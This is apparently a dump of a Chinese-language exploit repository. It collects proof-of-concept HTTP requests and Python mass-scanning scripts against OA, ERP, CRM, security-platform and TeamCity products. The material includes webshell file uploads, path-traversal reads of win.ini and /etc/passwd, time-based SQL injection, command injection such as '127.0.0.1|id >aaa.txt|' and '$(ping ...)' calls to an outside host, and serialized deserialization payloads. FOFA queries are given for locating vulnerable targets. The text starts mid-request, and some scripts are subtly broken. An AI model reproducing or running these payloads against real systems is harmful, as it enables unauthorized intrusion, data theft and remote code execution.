sec-ch-ua-platform: "Windows" 21 | 
sec-fetch-user: ?1 22 | 23 | ------WebKitFormBoundary03rNBzFMIytvpWhy 24 | Content-Disposition: form-data; name="file"; filename="1.php" 25 | Content-Type: image/jpeg 26 | 27 | 28 | ------WebKitFormBoundary03rNBzFMIytvpWhy-- 29 | ``` 30 | 31 | -------------------------------------------------------------------------------- /易宝OA 存在BasicService存在任意文件上传漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | POST /WebService/BasicService.asmx HTTP/1.1 3 | Host: 4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 5 | Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 6 | Accept-Encoding: gzip, deflate, br 7 | Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 8 | Connection: close 9 | Content-Type: text/xml; charset=utf-8 10 | Content-Length: 501 11 | 12 | 13 | 14 | 15 | 16 | MTIzNA== 17 | ../../manager/2.txt 18 | {ac80457b-368d-4062-b2dd-ae4d490e1c4b} 19 | 20 | 21 | 22 | ``` 23 | 24 | 出现如下数据代表漏洞存在:url+2.txt 25 | 26 | ![image-20240729092805340](易宝OA 存在BasicService存在任意文件上传漏洞.assets/image-20240729092805340.png) 27 | 28 | ***\*fofa:\****title="欢迎登录易宝OA系统" || banner="易宝OA" -------------------------------------------------------------------------------- /好视通视频会议系统存在任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | ```python 2 | import requests 3 | import concurrent.futures 4 | 5 | def check_vulnerability(target): 6 | headers = { 7 | 8 | "User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", 9 | "Content-Length":"0" 10 | } 11 | try: 12 | # print(target) 13 | res = requests.get(f"{target}/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini", headers=headers, timeout=5,verify=False) 14 | if "extensions"in res.text and "CMCDLLNAME32" in res.text: 15 | print(f"[+]{target}漏洞存在") 16 | with open("attack.txt",'a') as fw: 17 | 
fw.write(f"{target}\n") 18 | else: 19 | print(f"[-]{target}漏洞不存在") 20 | except Exception as e: 21 | print(f"[-]{target}访问错误") 22 | 23 | if __name__ == "__main__": 24 | print("target.txt存放目标文件") 25 | print("attack.txt存放检测结果") 26 | print("按回车继续") 27 | import os 28 | os.system("pause") 29 | f = open("target.txt", 'r') 30 | targets = f.read().splitlines() 31 | print(targets) 32 | 33 | with concurrent.futures.ThreadPoolExecutor(max_workers=1) as executor: 34 | executor.map(check_vulnerability, targets) 35 | ``` 36 | 37 | -------------------------------------------------------------------------------- /用友NC任意文件读取.md: -------------------------------------------------------------------------------- 1 | ```python 2 | import requests 3 | import concurrent.futures 4 | 5 | def check_vulnerability(target): 6 | headers = { 7 | "User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" 8 | } 9 | 10 | try: 11 | # print(target) 12 | 13 | res = requests.get(fr"http://{target}/portal/pt/xml/file/download?pageId=login&filename=..\index.jsp", headers=headers, data=r"decorator=%2FWEB-INF%2Fweb.xml&confirm=true", timeout=5) 14 | if "window.location" in res.text : 15 | print(f"[+]{target}漏洞存在") 16 | with open("attack.txt",'a') as fw: 17 | fw.write(f"{target}\n") 18 | else: 19 | print(f"[-]{target}漏洞不存在") 20 | except Exception as e: 21 | print(f"[-]{target}访问错误") 22 | if __name__ == "__main__": 23 | print("target.txt存放目标文件") 24 | print("attack.txt存放检测结果") 25 | print("------------------------") 26 | print("按回车继续") 27 | import os 28 | os.system("pause") 29 | f = open("target.txt", 'r') 30 | targets = f.read().splitlines() 31 | print(targets) 32 | 33 | # 使用线程池并发执行检查漏洞 34 | with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor: 35 | executor.map(check_vulnerability, targets) 36 | ``` 37 | 38 | -------------------------------------------------------------------------------- /深澜计费管理系统strategy存在反序列化漏洞.md: 
-------------------------------------------------------------------------------- 1 | ``` 2 | POST /strategy/ip/bind-ip HTTP/2 3 | Host: 4 | Cookie: lang=zh-CN; PHPSESSID_8080=f434cd5f5e9befe38ab3d688b49eacb5; _csrf-8080=515a2ce1d579e3eb33de0fb00d2eddb40cbfb5db938eb248ddaa2069ed9ba803a%3A2%3A%7Bi%3A0%3Bs%3A10%3A%22_csrf-8080%22%3Bi%3A1%3Bs%3A32%3A%22zKeB2l7C4-gTmKM4dulmKqnWGCnlHFDP%22%3B%7D 5 | Cache-Control: max-age=0 6 | Sec-Ch-Ua: "Not A(Brand";v="99", "Google Chrome";v="121", "Chromium";v="121" 7 | Sec-Ch-Ua-Mobile: ?0 8 | Sec-Ch-Ua-Platform: "Windows" 9 | Upgrade-Insecure-Requests: 1 10 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 11 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 12 | Sec-Fetch-Site: none 13 | Sec-Fetch-Mode: navigate 14 | Sec-Fetch-User: ?1 15 | Sec-Fetch-Dest: document 16 | Accept-Encoding: gzip, deflate 17 | Content-Type: application/x-www-form-urlencoded 18 | Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 19 | Content-Length: 1265 20 | 21 | data1=O%3A33%3A%22setasign%5CFpdi%5CPdfReader%5CPdfReader%22%3A1%3A%7Bs%3A9%3A%22%00%2A%00parser%22%3BO%3A20%3A%22yii%5Credis%5CConnection%22%3A12%3A%7B 22 | ``` 23 | 24 | -------------------------------------------------------------------------------- /任我行协同CRM反序列化漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | POST /SystemManage/UploadFile HTTP/1.1 3 | Host: 4 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 5 | Upgrade-Insecure-Requests: 1 6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 7 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 8 | Accept-Encoding: gzip, deflate 9 | Content-Type: 
application/x-www-form-urlencoded 10 | Content-Length: 8 11 | cmd: whoami 12 | 13 | photoInfo={{base64dec(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)}} 14 | ``` 15 | 16 | -------------------------------------------------------------------------------- /明源云ERP接口ApiUpdate.ashx文件上传漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | 3 | POST /myunke/ApiUpdateTool/ApiUpdate.ashx?apiocode=a HTTP/1.1 4 | Host: target.com 5 | Accept-Encoding: gzip 6 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3)AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 7 | Content-Length: 856 8 | 9 | {{unquote("PK\x03\x04\x14\x00\x00\x00\x08\x00\xf2\x9a\x0bW\x97\xe9\x8br\x8c\x00\x00\x00\x93\x00\x00\x00\x1e\x00\x00\x00../../../fdccloud/_/check.aspx$\xcc\xcb\x0a\xc20\x14\x04\xd0_\x09\x91B\xbb\x09\x0a\xddH\xab\x29\x8aP\xf0QZ\xc4\xf5m\x18j!ib\x1e\x82\x7fo\xc4\xdd0g\x98:\xdb\xb1\x96F\xb03\xcdcLa\xc3\x0f\x0b\xce\xb2m\x9d\xa0\xd1\xd6\xb8\xc0\xae\xa4\xe1-\xc9d\xfd\xc7\x07h\xd1\xdc\xfe\x13\xd6%0\xb3\x87x\xb8\x28\xe7R\x96\xcbr5\xacyQ\x9d&\x05q\x84B\xea\x7b\xb87\x9c\xb8\x90m\x28<\xf3\x0e\xaf\x08\x1f\xc4\xdd\x28\xb1\x1f\xbcQ1\xe0\x07EQ\xa5\xdb/\x00\x00\x00\xff\xff\x03\x00PK\x01\x02\x14\x03\x14\x00\x00\x00\x08\x00\xf2\x9a\x0bW\x97\xe9\x8br\x8c\x00\x00\x00\x93\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00../../../fdccloud/_/check.aspxPK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00L\x00\x00\x00\xc8\x00\x00\x00\x00\x00")}} 10 | vsoft=kvm&hostType=physical&name=penson&extranet=127.0.0.1%7Ccalc.exe&cpuCores=2& 11 | memory=16&diskSize=16&desc=&uid=640be59da4851&type=za 12 | ``` 13 | 14 | -------------------------------------------------------------------------------- /F-logic DataCube3存在命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | 获取accesstime 2 | 3 | ``` 4 | GET /admin/setting_photo.php HTTP/1.1 5 | Host: 6 | User-Agent: Mozilla/5.0 
(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 7 | Accept-Encoding: gzip, deflate 8 | ``` 9 | 10 | 使用获取到accesstime填入到下面 11 | 12 | ``` 13 | POST /admin/config_time_sync.php HTTP/1.1 14 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 15 | Accept-Encoding: gzip, deflate 16 | Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 17 | Cache-Control: max-age=0 18 | Connection: keep-alive 19 | Content-Length: 116 20 | Content-Type: application/x-www-form-urlencoded 21 | Cookie: SESS_IDS=24ef0vbucnke26mtreijnfumve 22 | Host: x.x.x.x 23 | Upgrade-Insecure-Requests: 1 24 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 25 | 26 | accesstime=0.66992700 1710752870&execute=&ntp_enable=&ntp_server=127.0.0.1|id >aaa.txt|&ntp_retry_count=1 27 | ``` 28 | 29 | 30 | 31 | ``` 32 | 33 | GET /admin/aaa.txt HTTP/1.1 34 | Host: 35 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 36 | Accept-Encoding: gzip, deflate 37 | ``` 38 | 39 | -------------------------------------------------------------------------------- /Jetbrains_Teamcity_远程代码执行漏洞_CVE_2023_42793.md: -------------------------------------------------------------------------------- 1 | ``` 2 | DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1 3 | Host: 4 | Content-Type: application/x-www-form-urlencoded 5 | 6 | 7 | POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1 8 | 9 | 10 | 11 | POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1 12 | Host: 13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 14 | Connection: close 15 | Authorization: Bearer [管理员token] 16 | Content-Type: 
application/x-www-form-urlencoded 17 | Accept-Encoding: gzip, deflate, br 18 | Content-Length: 0 19 | 20 | 21 | POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1 22 | Host: 23 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 24 | Connection: close 25 | Authorization: Bearer [管理员token] 26 | Content-Type: application/x-www-form-urlencoded 27 | Accept-Encoding: gzip, deflate, br 28 | Content-Length: 0 29 | 30 | 31 | 32 | POST /app/rest/debug/processes?exePath=id&parms=-a HTTP/1.1 33 | Host: 34 | Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.MjFfTWxGODVqLXdTMmNfRjRldk9pMXNQSk1B.MTg1YTZlYzQtMDJlZi00NzljLWFhOWYtMmJiODYzYTYzODNj 35 | ``` 36 | 37 | -------------------------------------------------------------------------------- /泛微云桥文件上传.md: -------------------------------------------------------------------------------- 1 | ```http 2 | POST /wxclient/app/recruit/resume/addResume?fileElementId=H HTTP/1.1 3 | Host: 127.0.0.1:8088 4 | Content-Length: 361 5 | Cache-Control: max-age=0 6 | sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99" 7 | sec-ch-ua-mobile: ?0 8 | sec-ch-ua-platform: "Windows" 9 | Upgrade-Insecure-Requests: 1 10 | Origin: null 11 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryD5Mawpg068t7pbxZ 12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 13 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 14 | Sec-Fetch-Site: cross-site 15 | Sec-Fetch-Mode: navigate 16 | Sec-Fetch-User: ?1 17 | Sec-Fetch-Dest: document 18 | Accept-Encoding: gzip, deflate 19 | Accept-Language: zh-CN,zh;q=0.9 20 | Connection: close 21 | 22 | ------WebKitFormBoundaryD5Mawpg068t7pbxZ 23 | Content-Disposition: form-data; name="file"; 
filename="shell.jsp" 24 | Content-Type: application/octet-stream 25 | 26 | 127 27 | ------WebKitFormBoundaryD5Mawpg068t7pbxZ 28 | Content-Disposition: form-data; name="file"; filename="shell.jsp" 29 | Content-Type: application/octet-stream 30 | 31 | 127 32 | ------WebKitFormBoundaryD5Mawpg068t7pbxZ-- 33 | ``` 34 | 35 | shell地址: 36 | 37 | /upload/202408/1-2位大写字母/shell.jsp -------------------------------------------------------------------------------- /APP分发签名系统index-uplog.php存在任意文件上传漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | POST /source/pack/upload/2upload/index-uplog.php HTTP/1.1 3 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 4 | Accept-Encoding: gzip, deflate, br, zstd 5 | Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 6 | Cache-Control: max-age=0 7 | Connection: keep-alive 8 | Content-Length: 290 9 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfF7NbGp0PAFq8Mkd 10 | Host: 127.0.0.1 11 | Origin: http://127.0.0.1 12 | Referer: http://127.0.0.1/source/pack/upload/2upload/index-uplog.php 13 | Sec-Fetch-Dest: document 14 | Sec-Fetch-Mode: navigate 15 | Sec-Fetch-Site: none 16 | Upgrade-Insecure-Requests: 1 17 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 18 | sec-ch-ua: "Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24" 19 | sec-ch-ua-mobile: ?0 20 | sec-ch-ua-platform: "Windows" 21 | sec-fetch-user: ?1 22 | 23 | ------WebKitFormBoundary03rNBzFMIytvpWhy 24 | Content-Disposition: form-data; name="time" 25 | 26 | 1-2 27 | ------WebKitFormBoundary03rNBzFMIytvpWhy 28 | Content-Disposition: form-data; name="app"; filename="1.php" 29 | Content-Type: image/jpeg 30 | 31 | 32 | ------WebKitFormBoundary03rNBzFMIytvpWhy-- 33 | ``` 34 | 35 | 
-------------------------------------------------------------------------------- /海康威视综合安防管理平台icenseExpire.do存在远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | **fofa语法:** 2 | 3 | app="HIKVISION-综合安防管理平台" 4 | 5 | ``` 6 | payload: 7 | POST 8 | /portal/cas/login/ajax/licenseExpire.do HTTP/1.1 9 | Host: 10 | Content-Type: 11 | application/x-www-form-urlencoded 12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; 13 | Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 14 | Safari/537.36 15 | {"type":"environment","operate":"","machines":{"id":"$(ping+qsdiehtuxn.dgrh3.cn)"}Copy 16 | to clipboardErrorCopied 17 | ``` 18 | 19 | ``` 20 | 文件路径 /vms/static/1.txt payload: 21 | POST 22 | /portal/cas/login/ajax/licenseExpire.do HTTP/1.1 23 | Host: 24 | Cache-Control: max-age=0 25 | Accept: application/json, text/javascript, 26 | */*; q=0.01 27 | X-Requested-With: XMLHttpRequest 28 | If-Modified-Since: Thu, 01 Jun 1970 29 | 00:00:00 GMT 30 | User-Agent: Mozilla/5.0 (Windows NT 10.0; 31 | Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 32 | Safari/537.36 33 | Content-Type: 34 | application/x-www-form-urlencoded 35 | Accept-Encoding: gzip, deflate 36 | Accept-Language: zh-CN,zh;q=0.9 37 | Cookie: 38 | JSESSIONID=jp9u6tFmSc3fk7Jzf9DQjK25abfBb_b4Yy1r4rax; curtTabId=all; configMenu= 39 | Connection: close 40 | Content-Length: 135 41 | {"type":"environment","operate":"","machines":{"id":"$(id 42 | > 43 | /opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/1.txt)"} 44 | ```` 45 | 46 | -------------------------------------------------------------------------------- /Docassemble任意文件读取漏洞(CVE-2024-27292).md: -------------------------------------------------------------------------------- 1 | ## fofa 2 | 3 | ``` 4 | icon_hash="-575790689" 5 | ``` 6 | 7 | ## poc 8 | 9 | ``` 10 | id: CVE-2024-27292 11 | 12 | info: 13 | name:Docassemble-LocalFileInclusion 14 | author:johnk3r 15 | severity:high 16 
| description:| 17 | Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch. 18 | reference: 19 | -https://tantosec.com/blog/docassemble/ 20 | -https://github.com/jhpyle/docassemble/security/advisories/GHSA-jq57-3w7p-vwvv 21 | -https://github.com/jhpyle/docassemble/commit/97f77dc486a26a22ba804765bfd7058aabd600c9 22 | classification: 23 | cvss-metrics:CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 24 | cvss-score:7.5 25 | cve-id:CVE-2024-27292 26 | cwe-id:CWE-706 27 | epss-score:0.00043 28 | epss-percentile:0.0866 29 | metadata: 30 | verified:true 31 | max-request:1 32 | shodan-query:http.title:"docassemble" 33 | fofa-query:icon_hash="-575790689" 34 | tags:cve,cve2024,docassemble,lfi 35 | 36 | http: 37 | -method:GET 38 | path: 39 | -"{{BaseURL}}/interview?i=/etc/passwd" 40 | 41 | matchers-condition:and 42 | matchers: 43 | -type:regex 44 | regex: 45 | -"root:.*:0:0:" 46 | 47 | -type:status 48 | status: 49 | - 501 50 | ``` 51 | 52 | -------------------------------------------------------------------------------- /捷诚管理信息系统 SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | ```python 2 | import time 3 | import requests 4 | 5 | def verify(ip): 6 | url = f'{ip}EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx' 7 | headers = { 8 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 9 | 'Connection': 'close', 10 | 'Content-Length': '369', 11 | 'Accept': '*/*', 12 | 'Accept-Language': 'en', 13 | 'Content-Type': 'text/xml; charset=utf-8', 14 | 'Accept-Encoding': 'gzip', 15 | } 16 | payload = ''' 17 | 18 | 19 | 20 | 1';waitfor delay '0:0:5'--+ 21 | 22 | 23 | ''' 24 | try: 25 | start_time = time.time() 26 | response = 
requests.post(url, headers=headers, data=payload,verify=False) 27 | end_time = time.time() 28 | res_time = end_time - start_time 29 | # 验证成功输出相关信息 30 | if response.status_code == 200 and res_time > 5 and res_time < 8: 31 | print(f"{ip}存在捷诚管理信息系统SQL注入漏洞!!!") 32 | 33 | except Exception as e: 34 | pass 35 | 36 | if __name__ == '__main__': 37 | self = input('请输入目标主机IP地址:') 38 | verify(self) 39 | ``` 40 | 41 | -------------------------------------------------------------------------------- /山石网科云鉴存在前台任意命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | ```python 2 | import requests 3 | ''' 4 | HSVD-2023-0008 5 | ''' 6 | def setSystemTimeAction(newcsrf,headers): 7 | url = "https://192.168.199.221/master/ajaxActions/setSystemTimeAction.php?token_csrf="+newcsrf 8 | proxies = {'https':'http://127.0.0.1:8080'} 9 | x = "param=os.system('id > /opt/var/majorsec/installation/master/runtime/img/config')" 10 | #req2 = requests.post(url2, data=x, proxies=proxies, verify=False, headers=headers) 11 | req2 = requests.post(url, data=x,headers=headers, verify=False) 12 | 13 | ''' 14 | HSVD-2023-0005 15 | ''' 16 | def getMessageSettingAction(newcsrf,header): 17 | proxies = {'https':'http://127.0.0.1:8080'} 18 | company_uuid = "aaa" 19 | platform_sel = "os.system('id > /opt/var/majorsec/installation/master/runtime/img/config')" 20 | url = 'https://192.168.199.221/master/ajaxActions/getMessageSettingAction.php?token_csrf='+newcsrf+"&company_uuid="+company_uuid+"&platform_sel="+platform_sel 21 | req = requests.get(url, headers=header, verify=False) 22 | print(req.text) 23 | 24 | 25 | def main(): 26 | headers = {"Cookie": "PHPSESSID=emhpeXVhbg;", 27 | "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8" 28 | } 29 | url = "https://192.168.199.221/master/ajaxActions/getTokenAction.php" 30 | req = requests.post(url, verify=False, headers=headers) 31 | newcsrf = req.text.replace("\n", "") 32 | setSystemTimeAction(newcsrf,headers) 33 | 
reshell = requests.get('https://192.168.199.221/master/img/config',verify=False) 34 | print('---------------------cmd-------------------------') 35 | print(reshell.text) 36 | 37 | if __name__ == '__main__': 38 | main() 39 | ``` 40 | 41 | -------------------------------------------------------------------------------- /科荣 AIO 管理系统任意文件读取.md: -------------------------------------------------------------------------------- 1 | ```python 2 | import base64 3 | import requests 4 | 5 | def poc(ip, file_path): 6 | 7 | # 构造URL地址 8 | url = f'http://{ip}/UtilServlet' 9 | headers = { 10 | 'Upgrade - Insecure - Requests': '1', 11 | 'sec - ch - ua - mobile': '?0', 12 | 'Cache - Control': 'no - cache', 13 | 'Pragma': 'no - cache', 14 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7', 15 | 'Accept - Encoding': 'gzip, deflate', 16 | 'Content - Type': 'application / x - www - form - urlencoded', 17 | 'sec - ch - ua': '"Google Chrome";v="118", "Chromium";v="118", "Not=A?Brand";v="24"', 18 | 'sec - ch - ua - platform': '"Windows"', 19 | 'Accept - Language': 'zh-CN,zh;q=0.9', 20 | 'User - Agent': 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36', 21 | 'Content - Length': '0' 22 | } 23 | data = { 24 | f'operation=readErrorExcel&fileName={file_path}' 25 | } 26 | print(url,data) 27 | try: 28 | response = requests.get(url=url, headers=headers, data=data) 29 | byte_data = response.encode(encoding='utf-8') 30 | response = base64.b64encode(byte_data) 31 | print(response) 32 | if response.status_code == 200 : 33 | print(f' {ip} 存在科荣 AIO 管理系统任意文件读取漏洞!!!') 34 | print(response.text) 35 | except Exception as e: 36 | print(f'{ip} 请求失败:{e}') 37 | pass 38 | 39 | if __name__ == '__main__': 40 | ip = input('请输入目标主机IP地址:') 41 | file_path = input('请输入需要访问的文件路径:') 42 | poc(ip, file_path) 43 | ``` 44 | 45 | 
-------------------------------------------------------------------------------- /用友U9系统DoQuery接口存在SQL注入.md: -------------------------------------------------------------------------------- 1 | ``` 2 | POST /U9C/CS/Office/TransWebService.asmx HTTP/1.1 3 | Host: 4 | Content-Type: text/xml; charset=utf-8 5 | Content-Length: 309 6 | SOAPAction: "http://tempuri.org/GetEnterprise" 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | POST /U9C/CS/Office/TransWebService.asmx HTTP/1.1 18 | Host: 19 | Content-Type: text/xml; charset=utf-8 20 | Content-Length: 345 21 | SOAPAction: "http://tempuri.org/GetToken" 22 | 23 | 24 | 25 | 26 | 27 | 000 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | POST /U9C/CS/Office/TransWebService.asmx HTTP/1.1 36 | Host: 37 | Content-Type: text/xml; charset=utf-8 38 | Content-Length: 345 39 | SOAPAction: "http://tempuri.org/DoQuery" 40 | 41 | 42 | 43 | 44 | 45 | 46 | select 1;waitfor delay '0:0:1' -- 47 | 48 | 49 | 50 | ``` 51 | 52 | -------------------------------------------------------------------------------- /H3C Magic B1STV100R012 RCE.md: -------------------------------------------------------------------------------- 1 | ``` 2 | POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 3 | Host: xxx.xxx.xxx.xxx 4 | Content-Length: 1569 5 | Content-Type: application/x-www-form-urlencoded 6 | 7 | 
pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=whoami 8 | ``` 9 | 10 | -------------------------------------------------------------------------------- /致远 OA fileUpload.do 前台文件上传绕过漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | 3 | POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1 4 | Host: 5 | Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 6 | Content-Type: multipart/form-data; 
boundary=00content0boundary00 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30) 7 | Content-Length: 754 8 | 9 | --00content0boundary00 10 | Content-Disposition: form-data; name="type" 11 | 12 | --00content0boundary00 13 | Content-Disposition: form-data; name="extensions" 14 | 15 | png 16 | --00content0boundary00 17 | Content-Disposition: form-data; name="applicationCategory" 18 | 19 | --00content0boundary00 20 | Content-Disposition: form-data; name="destDirectory" 21 | 22 | --00content0boundary00 23 | Content-Disposition: form-data; name="destFilename" 24 | 25 | --00content0boundary00 26 | Content-Disposition: form-data; name="maxSize" 27 | 28 | --00content0boundary00 29 | Content-Disposition: form-data; name="isEncrypt" 30 | 31 | false 32 | --00content0boundary00 33 | Content-Disposition: form-data; name="file1"; filename="1.png" Content-Type: Content-Type: application/pdf 34 | <% out.println("hello");%> 35 | --00content0boundary00-- 36 | ``` 37 | 38 | 39 | 40 | 41 | 42 | 修改文件后缀为 jsp 43 | 44 | ``` 45 | POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1 46 | Host: 47 | Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 48 | Content-type: 